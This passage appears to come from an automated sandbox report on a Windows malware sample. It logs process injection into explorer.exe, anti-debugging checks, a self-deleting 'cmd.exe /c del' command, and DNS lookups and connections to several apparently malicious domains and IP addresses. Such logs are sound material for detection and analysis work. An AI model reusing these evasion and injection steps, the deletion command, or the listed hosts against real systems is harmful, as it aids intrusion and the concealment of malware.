            Source: C:\Windows\SysWOW64\explorer.exeCode function: 16_2_052AB8D0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\explorer.exeCode function: 16_2_052AB8D0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\explorer.exeCode function: 16_2_052D131B mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\explorer.exeCode function: 16_2_0521DB60 mov ecx, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\explorer.exeCode function: 16_2_05243B7A mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\explorer.exeCode function: 16_2_05243B7A mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\explorer.exeCode function: 16_2_0521DB40 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\explorer.exeCode function: 16_2_052E8B58 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\explorer.exeCode function: 16_2_0521F358 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\explorer.exeCode function: 16_2_05244BAD mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\explorer.exeCode function: 16_2_05244BAD mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\explorer.exeCode function: 16_2_05244BAD mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\explorer.exeCode function: 16_2_052E5BA5 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\explorer.exeCode function: 16_2_052D138A mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\explorer.exeCode function: 16_2_052CD380 mov ecx, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\explorer.exeCode function: 16_2_05221B8F mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\explorer.exeCode function: 16_2_05221B8F mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\explorer.exeCode function: 16_2_05242397 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\explorer.exeCode function: 16_2_0524B390 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\explorer.exeCode function: 16_2_052403E2 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\explorer.exeCode function: 16_2_052403E2 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\explorer.exeCode function: 16_2_052403E2 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\explorer.exeCode function: 16_2_052403E2 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\explorer.exeCode function: 16_2_052403E2 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\explorer.exeCode function: 16_2_052403E2 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\explorer.exeCode function: 16_2_0523DBE9 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\explorer.exeCode function: 16_2_052953CA mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\explorer.exeCode function: 16_2_052953CA mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\explorer.exeCode function: 16_2_05254A2C mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\explorer.exeCode function: 16_2_05254A2C mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\explorer.exeCode function: 16_2_0523A229 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\explorer.exeCode function: 16_2_0523A229 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\explorer.exeCode function: 16_2_0523A229 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\explorer.exeCode function: 16_2_0523A229 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\explorer.exeCode function: 16_2_0523A229 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\explorer.exeCode function: 16_2_0523A229 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\explorer.exeCode function: 16_2_0523A229 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\explorer.exeCode function: 16_2_0523A229 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\explorer.exeCode function: 16_2_0523A229 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\explorer.exeCode function: 16_2_05228A0A mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\explorer.exeCode function: 16_2_05215210 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\explorer.exeCode function: 16_2_05215210 mov ecx, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\explorer.exeCode function: 16_2_05215210 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\explorer.exeCode function: 16_2_05215210 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\explorer.exeCode function: 16_2_0521AA16 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\explorer.exeCode function: 16_2_0521AA16 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\explorer.exeCode function: 16_2_052DAA16 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\explorer.exeCode function: 16_2_052DAA16 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\explorer.exeCode function: 16_2_05233A1C mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\explorer.exeCode function: 16_2_052CB260 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\explorer.exeCode function: 16_2_052CB260 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\explorer.exeCode function: 16_2_052E8A62 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\explorer.exeCode function: 16_2_0525927A mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\explorer.exeCode function: 16_2_05219240 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\explorer.exeCode function: 16_2_05219240 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\explorer.exeCode function: 16_2_05219240 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\explorer.exeCode function: 16_2_05219240 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\explorer.exeCode function: 16_2_052DEA55 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\explorer.exeCode function: 16_2_052A4257 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\explorer.exeCode function: 16_2_052152A5 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\explorer.exeCode function: 16_2_052152A5 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\explorer.exeCode function: 16_2_052152A5 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\explorer.exeCode function: 16_2_052152A5 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\explorer.exeCode function: 16_2_052152A5 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\explorer.exeCode function: 16_2_0522AAB0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\explorer.exeCode function: 16_2_0522AAB0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\explorer.exeCode function: 16_2_0524FAB0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\explorer.exeCode function: 16_2_0524D294 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\explorer.exeCode function: 16_2_0524D294 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\explorer.exeCode function: 16_2_05242AE4 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\explorer.exeCode function: 16_2_05242ACB mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\tlBHrCrteFXy8Jz.exeProcess queried: DebugPort
            Source: C:\Windows\SysWOW64\explorer.exeProcess queried: DebugPort
            Source: C:\Users\user\Desktop\tlBHrCrteFXy8Jz.exeCode function: 11_2_00409B30 LdrLoadDll,
            Source: C:\Users\user\Desktop\tlBHrCrteFXy8Jz.exeMemory allocated: page read and write | page guard

            HIPS / PFW / Operating System Protection Evasion

            barindex
            Source: C:\Windows\explorer.exeDomain query: www.thietkenoithatvanphong.asia
            Source: C:\Windows\explorer.exeNetwork Connect: 160.153.136.3 80
            Source: C:\Windows\explorer.exeNetwork Connect: 222.255.46.12 80
            Source: C:\Windows\explorer.exeNetwork Connect: 162.241.24.116 80
            Source: C:\Windows\explorer.exeDomain query: www.desertbirdmercantile.com
            Source: C:\Windows\explorer.exeDomain query: www.yzztx.com
            Source: C:\Windows\explorer.exeDomain query: www.sigmamu.com
            Source: C:\Windows\explorer.exeNetwork Connect: 154.214.67.82 80
            Source: C:\Users\user\Desktop\tlBHrCrteFXy8Jz.exeSection unmapped: C:\Windows\SysWOW64\explorer.exe base address: B10000
            Source: C:\Users\user\Desktop\tlBHrCrteFXy8Jz.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
            Source: C:\Users\user\Desktop\tlBHrCrteFXy8Jz.exeSection loaded: unknown target: C:\Windows\SysWOW64\explorer.exe protection: execute and read and write
            Source: C:\Users\user\Desktop\tlBHrCrteFXy8Jz.exeSection loaded: unknown target: C:\Windows\SysWOW64\explorer.exe protection: execute and read and write
            Source: C:\Windows\SysWOW64\explorer.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: read write
            Source: C:\Windows\SysWOW64\explorer.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
            Source: C:\Users\user\Desktop\tlBHrCrteFXy8Jz.exeMemory written: C:\Users\user\Desktop\tlBHrCrteFXy8Jz.exe base: 400000 value starts with: 4D5A
            Source: C:\Users\user\Desktop\tlBHrCrteFXy8Jz.exeThread APC queued: target process: C:\Windows\explorer.exe
            Source: C:\Users\user\Desktop\tlBHrCrteFXy8Jz.exeThread register set: target process: 3292
            Source: C:\Windows\SysWOW64\explorer.exeThread register set: target process: 3292
            Source: C:\Users\user\Desktop\tlBHrCrteFXy8Jz.exeProcess created: C:\Users\user\Desktop\tlBHrCrteFXy8Jz.exe C:\Users\user\Desktop\tlBHrCrteFXy8Jz.exe
            Source: C:\Windows\SysWOW64\explorer.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Users\user\Desktop\tlBHrCrteFXy8Jz.exe"
            Source: explorer.exe, 0000000D.00000000.400631893.0000000001400000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 0000000D.00000000.343302480.0000000001400000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 0000000D.00000000.328180809.0000000001400000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 0000000D.00000000.307734039.0000000001400000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: uProgram Manager
            Source: tlBHrCrteFXy8Jz.exe, 0000000B.00000002.375162074.0000000003380000.00000040.10000000.00040000.00000000.sdmp, explorer.exe, 0000000D.00000000.400631893.0000000001400000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 0000000D.00000000.343302480.0000000001400000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 0000000D.00000000.317315984.0000000005F40000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000D.00000000.328180809.0000000001400000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 0000000D.00000000.307734039.0000000001400000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Shell_TrayWnd
            Source: explorer.exe, 0000000D.00000000.400631893.0000000001400000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 0000000D.00000000.343302480.0000000001400000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 0000000D.00000000.328180809.0000000001400000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 0000000D.00000000.307734039.0000000001400000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progman
            Source: tlBHrCrteFXy8Jz.exe, 0000000B.00000002.375162074.0000000003380000.00000040.10000000.00040000.00000000.sdmpBinary or memory string: Microsoft-Reserved-24C26ACC-DE62-4303-88AD-6CD4F1447F18SecurityConfigureWindowsPasswordsProxy DesktopProgmanSoftware\Microsoft\Windows NT\CurrentVersion\WinlogonShellSoftware\Microsoft\Windows NT\CurrentVersion\Winlogon\AlternateShells\AvailableShells
            Source: explorer.exe, 0000000D.00000000.400631893.0000000001400000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 0000000D.00000000.343302480.0000000001400000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 0000000D.00000000.328180809.0000000001400000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 0000000D.00000000.307734039.0000000001400000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progmanlock
            Source: explorer.exe, 0000000D.00000000.306717343.0000000000EB8000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000D.00000000.342987929.0000000000EB8000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000D.00000000.400324012.0000000000EB8000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000D.00000000.327885789.0000000000EB8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ProgmanX
            Source: explorer.exe, 0000000D.00000000.335543509.0000000008ACF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000D.00000000.320761476.0000000008ACF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000D.00000000.353740473.0000000008ACF000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Shell_TrayWndAj
            Source: C:\Users\user\Desktop\tlBHrCrteFXy8Jz.exeQueries volume information: C:\Users\user\Desktop\tlBHrCrteFXy8Jz.exe VolumeInformation
            Source: C:\Users\user\Desktop\tlBHrCrteFXy8Jz.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
            Source: C:\Users\user\Desktop\tlBHrCrteFXy8Jz.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
            Source: C:\Users\user\Desktop\tlBHrCrteFXy8Jz.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
            Source: C:\Users\user\Desktop\tlBHrCrteFXy8Jz.exeQueries volume information: C:\Windows\Fonts\arial.ttf VolumeInformation
            Source: C:\Users\user\Desktop\tlBHrCrteFXy8Jz.exeQueries volume information: C:\Windows\Fonts\ariali.ttf VolumeInformation
            Source: C:\Users\user\Desktop\tlBHrCrteFXy8Jz.exeQueries volume information: C:\Windows\Fonts\arialbd.ttf VolumeInformation
            Source: C:\Users\user\Desktop\tlBHrCrteFXy8Jz.exeQueries volume information: C:\Windows\Fonts\arialbi.ttf VolumeInformation
            Source: C:\Users\user\Desktop\tlBHrCrteFXy8Jz.exeQueries volume information: C:\Windows\Fonts\ARIALN.TTF VolumeInformation
            Source: C:\Users\user\Desktop\tlBHrCrteFXy8Jz.exeQueries volume information: C:\Windows\Fonts\ariblk.ttf VolumeInformation
            Source: C:\Users\user\Desktop\tlBHrCrteFXy8Jz.exeQueries volume information: C:\Windows\Fonts\ARIALNI.TTF VolumeInformation
            Source: C:\Users\user\Desktop\tlBHrCrteFXy8Jz.exeQueries volume information: C:\Windows\Fonts\ARIALNB.TTF VolumeInformation
            Source: C:\Users\user\Desktop\tlBHrCrteFXy8Jz.exeQueries volume information: C:\Windows\Fonts\ARIALNBI.TTF VolumeInformation
            Source: C:\Users\user\Desktop\tlBHrCrteFXy8Jz.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation
            Source: C:\Users\user\Desktop\tlBHrCrteFXy8Jz.exeQueries volume information: C:\Windows\Fonts\calibri.ttf VolumeInformation
            Source: C:\Users\user\Desktop\tlBHrCrteFXy8Jz.exeQueries volume information: C:\Windows\Fonts\calibril.ttf VolumeInformation
            Source: C:\Users\user\Desktop\tlBHrCrteFXy8Jz.exeQueries volume information: C:\Windows\Fonts\calibrii.ttf VolumeInformation
            Source: C:\Users\user\Desktop\tlBHrCrteFXy8Jz.exeQueries volume information: C:\Windows\Fonts\calibrili.ttf VolumeInformation
            Source: C:\Users\user\Desktop\tlBHrCrteFXy8Jz.exeQueries volume information: C:\Windows\Fonts\calibrib.ttf VolumeInformation
            Source: C:\Users\user\Desktop\tlBHrCrteFXy8Jz.exeQueries volume information: C:\Windows\Fonts\calibriz.ttf VolumeInformation
            Source: C:\Users\user\Desktop\tlBHrCrteFXy8Jz.exeQueries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformation
            Source: C:\Users\user\Desktop\tlBHrCrteFXy8Jz.exeQueries volume information: C:\Windows\Fonts\cambriai.ttf VolumeInformation
            Source: C:\Users\user\Desktop\tlBHrCrteFXy8Jz.exeQueries volume information: C:\Windows\Fonts\cambriab.ttf VolumeInformation
            Source: C:\Users\user\Desktop\tlBHrCrteFXy8Jz.exeQueries volume information: C:\Windows\Fonts\cambriaz.ttf VolumeInformation
            Source: C:\Users\user\Desktop\tlBHrCrteFXy8Jz.exeQueries volume information: C:\Windows\Fonts\Candara.ttf VolumeInformation
            Source: C:\Users\user\Desktop\tlBHrCrteFXy8Jz.exeQueries volume information: C:\Windows\Fonts\Candarai.ttf VolumeInformation
            Source: C:\Users\user\Desktop\tlBHrCrteFXy8Jz.exeQueries volume information: C:\Windows\Fonts\Candarab.ttf VolumeInformation
            Source: C:\Users\user\Desktop\tlBHrCrteFXy8Jz.exeQueries volume information: C:\Windows\Fonts\Candaraz.ttf VolumeInformation
            Source: C:\Users\user\Desktop\tlBHrCrteFXy8Jz.exeQueries volume information: C:\Windows\Fonts\comic.ttf VolumeInformation
            Source: C:\Users\user\Desktop\tlBHrCrteFXy8Jz.exeQueries volume information: C:\Windows\Fonts\comici.ttf VolumeInformation
            Source: C:\Users\user\Desktop\tlBHrCrteFXy8Jz.exeQueries volume information: C:\Windows\Fonts\comicbd.ttf VolumeInformation
            Source: C:\Users\user\Desktop\tlBHrCrteFXy8Jz.exeQueries volume information: C:\Windows\Fonts\comicz.ttf VolumeInformation
            Source: C:\Users\user\Desktop\tlBHrCrteFXy8Jz.exeQueries volume information: C:\Windows\Fonts\consola.ttf VolumeInformation
            Source: C:\Users\user\Desktop\tlBHrCrteFXy8Jz.exeQueries volume information: C:\Windows\Fonts\consolai.ttf VolumeInformation
            Source: C:\Users\user\Desktop\tlBHrCrteFXy8Jz.exeQueries volume information: C:\Windows\Fonts\consolab.ttf VolumeInformation
            Source: C:\Users\user\Desktop\tlBHrCrteFXy8Jz.exeQueries volume information: C:\Windows\Fonts\consolaz.ttf VolumeInformation
            Source: C:\Users\user\Desktop\tlBHrCrteFXy8Jz.exeQueries volume information: C:\Windows\Fonts\constan.ttf VolumeInformation
            Source: C:\Users\user\Desktop\tlBHrCrteFXy8Jz.exeQueries volume information: C:\Windows\Fonts\constani.ttf VolumeInformation
            Source: C:\Users\user\Desktop\tlBHrCrteFXy8Jz.exeQueries volume information: C:\Windows\Fonts\constanb.ttf VolumeInformation
            Source: C:\Users\user\Desktop\tlBHrCrteFXy8Jz.exeQueries volume information: C:\Windows\Fonts\constanz.ttf VolumeInformation
            Source: C:\Users\user\Desktop\tlBHrCrteFXy8Jz.exeQueries volume information: C:\Windows\Fonts\corbel.ttf VolumeInformation
            Source: C:\Users\user\Desktop\tlBHrCrteFXy8Jz.exeQueries volume information: C:\Windows\Fonts\corbeli.ttf VolumeInformation
            Source: C:\Users\user\Desktop\tlBHrCrteFXy8Jz.exeQueries volume information: C:\Windows\Fonts\corbelb.ttf VolumeInformation
            Source: C:\Users\user\Desktop\tlBHrCrteFXy8Jz.exeQueries volume information: C:\Windows\Fonts\corbelz.ttf VolumeInformation
            Source: C:\Users\user\Desktop\tlBHrCrteFXy8Jz.exeQueries volume information: C:\Windows\Fonts\cour.ttf VolumeInformation
            Source: C:\Users\user\Desktop\tlBHrCrteFXy8Jz.exeQueries volume information: C:\Windows\Fonts\couri.ttf VolumeInformation
            Source: C:\Users\user\Desktop\tlBHrCrteFXy8Jz.exeQueries volume information: C:\Windows\Fonts\courbd.ttf VolumeInformation
            Source: C:\Users\user\Desktop\tlBHrCrteFXy8Jz.exeQueries volume information: C:\Windows\Fonts\courbi.ttf VolumeInformation
            Source: C:\Users\user\Desktop\tlBHrCrteFXy8Jz.exeQueries volume information: C:\Windows\Fonts\ebrima.ttf VolumeInformation
            Source: C:\Users\user\Desktop\tlBHrCrteFXy8Jz.exeQueries volume information: C:\Windows\Fonts\ebrimabd.ttf VolumeInformation
            Source: C:\Users\user\Desktop\tlBHrCrteFXy8Jz.exeQueries volume information: C:\Windows\Fonts\framd.ttf VolumeInformation
            Source: C:\Users\user\Desktop\tlBHrCrteFXy8Jz.exeQueries volume information: C:\Windows\Fonts\FRADM.TTF VolumeInformation
            Source: C:\Users\user\Desktop\tlBHrCrteFXy8Jz.exeQueries volume information: C:\Windows\Fonts\framdit.ttf VolumeInformation
            Source: C:\Users\user\Desktop\tlBHrCrteFXy8Jz.exeQueries volume information: C:\Windows\Fonts\FRADMIT.TTF VolumeInformation
            Source: C:\Users\user\Desktop\tlBHrCrteFXy8Jz.exeQueries volume information: C:\Windows\Fonts\FRAMDCN.TTF VolumeInformation
            Source: C:\Users\user\Desktop\tlBHrCrteFXy8Jz.exeQueries volume information: C:\Windows\Fonts\FRADMCN.TTF VolumeInformation
            Source: C:\Users\user\Desktop\tlBHrCrteFXy8Jz.exeQueries volume information: C:\Windows\Fonts\FRAHV.TTF VolumeInformation
            Source: C:\Users\user\Desktop\tlBHrCrteFXy8Jz.exeQueries volume information: C:\Windows\Fonts\FRAHVIT.TTF VolumeInformation
            Source: C:\Users\user\Desktop\tlBHrCrteFXy8Jz.exeQueries volume information: C:\Windows\Fonts\Gabriola.ttf VolumeInformation
            Source: C:\Users\user\Desktop\tlBHrCrteFXy8Jz.exeQueries volume information: C:\Windows\Fonts\gadugi.ttf VolumeInformation
            Source: C:\Users\user\Desktop\tlBHrCrteFXy8Jz.exeQueries volume information: C:\Windows\Fonts\gadugib.ttf VolumeInformation
            Source: C:\Users\user\Desktop\tlBHrCrteFXy8Jz.exeQueries volume information: C:\Windows\Fonts\georgia.ttf VolumeInformation
            Source: C:\Users\user\Desktop\tlBHrCrteFXy8Jz.exeQueries volume information: C:\Windows\Fonts\georgiai.ttf VolumeInformation
            Source: C:\Users\user\Desktop\tlBHrCrteFXy8Jz.exeQueries volume information: C:\Windows\Fonts\georgiab.ttf VolumeInformation
            Source: C:\Users\user\Desktop\tlBHrCrteFXy8Jz.exeQueries volume information: C:\Windows\Fonts\georgiaz.ttf VolumeInformation
            Source: C:\Users\user\Desktop\tlBHrCrteFXy8Jz.exeQueries volume information: C:\Windows\Fonts\impact.ttf VolumeInformation
            Source: C:\Users\user\Desktop\tlBHrCrteFXy8Jz.exeQueries volume information: C:\Windows\Fonts\Inkfree.ttf VolumeInformation
            Source: C:\Users\user\Desktop\tlBHrCrteFXy8Jz.exeQueries volume information: C:\Windows\Fonts\javatext.ttf VolumeInformation
            Source: C:\Users\user\Desktop\tlBHrCrteFXy8Jz.exeQueries volume information: C:\Windows\Fonts\LeelawUI.ttf VolumeInformation
            Source: C:\Users\user\Desktop\tlBHrCrteFXy8Jz.exeQueries volume information: C:\Windows\Fonts\LeelUIsl.ttf VolumeInformation
            Source: C:\Users\user\Desktop\tlBHrCrteFXy8Jz.exeQueries volume information: C:\Windows\Fonts\LeelaUIb.ttf VolumeInformation
            Source: C:\Users\user\Desktop\tlBHrCrteFXy8Jz.exeQueries volume information: C:\Windows\Fonts\lucon.ttf VolumeInformation
            Source: C:\Users\user\Desktop\tlBHrCrteFXy8Jz.exeQueries volume information: C:\Windows\Fonts\l_10646.ttf VolumeInformation
            Source: C:\Users\user\Desktop\tlBHrCrteFXy8Jz.exeQueries volume information: C:\Windows\Fonts\malgun.ttf VolumeInformation
            Source: C:\Users\user\Desktop\tlBHrCrteFXy8Jz.exeQueries volume information: C:\Windows\Fonts\malgunsl.ttf VolumeInformation
            Source: C:\Users\user\Desktop\tlBHrCrteFXy8Jz.exeQueries volume information: C:\Windows\Fonts\malgunbd.ttf VolumeInformation
            Source: C:\Users\user\Desktop\tlBHrCrteFXy8Jz.exeQueries volume information: C:\Windows\Fonts\himalaya.ttf VolumeInformation
            Source: C:\Users\user\Desktop\tlBHrCrteFXy8Jz.exeQueries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformation
            Source: C:\Users\user\Desktop\tlBHrCrteFXy8Jz.exeQueries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformation
            Source: C:\Users\user\Desktop\tlBHrCrteFXy8Jz.exeQueries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformation
            Source: C:\Users\user\Desktop\tlBHrCrteFXy8Jz.exeQueries volume information: C:\Windows\Fonts\ntailu.ttf VolumeInformation
            Source: C:\Users\user\Desktop\tlBHrCrteFXy8Jz.exeQueries volume information: C:\Windows\Fonts\ntailub.ttf VolumeInformation
            Source: C:\Users\user\Desktop\tlBHrCrteFXy8Jz.exeQueries volume information: C:\Windows\Fonts\phagspa.ttf VolumeInformation
            Source: C:\Users\user\Desktop\tlBHrCrteFXy8Jz.exeQueries volume information: C:\Windows\Fonts\phagspab.ttf VolumeInformation
            Source: C:\Users\user\Desktop\tlBHrCrteFXy8Jz.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation
            Source: C:\Users\user\Desktop\tlBHrCrteFXy8Jz.exeQueries volume information: C:\Windows\Fonts\taile.ttf VolumeInformation
            Source: C:\Users\user\Desktop\tlBHrCrteFXy8Jz.exeQueries volume information: C:\Windows\Fonts\taileb.ttf VolumeInformation
            Source: C:\Users\user\Desktop\tlBHrCrteFXy8Jz.exeQueries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformation
            Source: C:\Users\user\Desktop\tlBHrCrteFXy8Jz.exeQueries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformation
            Source: C:\Users\user\Desktop\tlBHrCrteFXy8Jz.exeQueries volume information: C:\Windows\Fonts\msyhbd.ttc VolumeInformation
            Source: C:\Users\user\Desktop\tlBHrCrteFXy8Jz.exeQueries volume information: C:\Windows\Fonts\msyi.ttf VolumeInformation
            Source: C:\Users\user\Desktop\tlBHrCrteFXy8Jz.exeQueries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformation
            Source: C:\Users\user\Desktop\tlBHrCrteFXy8Jz.exeQueries volume information: C:\Windows\Fonts\monbaiti.ttf VolumeInformation
            Source: C:\Users\user\Desktop\tlBHrCrteFXy8Jz.exeQueries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformation
            Source: C:\Users\user\Desktop\tlBHrCrteFXy8Jz.exeQueries volume information: C:\Windows\Fonts\mvboli.ttf VolumeInformation
            Source: C:\Users\user\Desktop\tlBHrCrteFXy8Jz.exeQueries volume information: C:\Windows\Fonts\mmrtext.ttf VolumeInformation
            Source: C:\Users\user\Desktop\tlBHrCrteFXy8Jz.exeQueries volume information: C:\Windows\Fonts\mmrtextb.ttf VolumeInformation
            Source: C:\Users\user\Desktop\tlBHrCrteFXy8Jz.exeQueries volume information: C:\Windows\Fonts\Nirmala.ttf VolumeInformation
            Source: C:\Users\user\Desktop\tlBHrCrteFXy8Jz.exeQueries volume information: C:\Windows\Fonts\NirmalaS.ttf VolumeInformation
            Source: C:\Users\user\Desktop\tlBHrCrteFXy8Jz.exeQueries volume information: C:\Windows\Fonts\NirmalaB.ttf VolumeInformation
            Source: C:\Users\user\Desktop\tlBHrCrteFXy8Jz.exeQueries volume information: C:\Windows\Fonts\pala.ttf VolumeInformation
            Source: C:\Users\user\Desktop\tlBHrCrteFXy8Jz.exeQueries volume information: C:\Windows\Fonts\palai.ttf VolumeInformation
            Source: C:\Users\user\Desktop\tlBHrCrteFXy8Jz.exeQueries volume information: C:\Windows\Fonts\palab.ttf VolumeInformation
            Source: C:\Users\user\Desktop\tlBHrCrteFXy8Jz.exeQueries volume information: C:\Windows\Fonts\palabi.ttf VolumeInformation
            Source: C:\Users\user\Desktop\tlBHrCrteFXy8Jz.exeQueries volume information: C:\Windows\Fonts\segoepr.ttf VolumeInformation
            Source: C:\Users\user\Desktop\tlBHrCrteFXy8Jz.exeQueries volume information: C:\Windows\Fonts\segoeprb.ttf VolumeInformation
            Source: C:\Users\user\Desktop\tlBHrCrteFXy8Jz.exeQueries volume information: C:\Windows\Fonts\segoesc.ttf VolumeInformation
            Source: C:\Users\user\Desktop\tlBHrCrteFXy8Jz.exeQueries volume information: C:\Windows\Fonts\segoescb.ttf VolumeInformation
            Source: C:\Users\user\Desktop\tlBHrCrteFXy8Jz.exeQueries volume information: C:\Windows\Fonts\seguiemj.ttf VolumeInformation
            Source: C:\Users\user\Desktop\tlBHrCrteFXy8Jz.exeQueries volume information: C:\Windows\Fonts\seguihis.ttf VolumeInformation
            Source: C:\Users\user\Desktop\tlBHrCrteFXy8Jz.exeQueries volume information: C:\Windows\Fonts\seguisym.ttf VolumeInformation
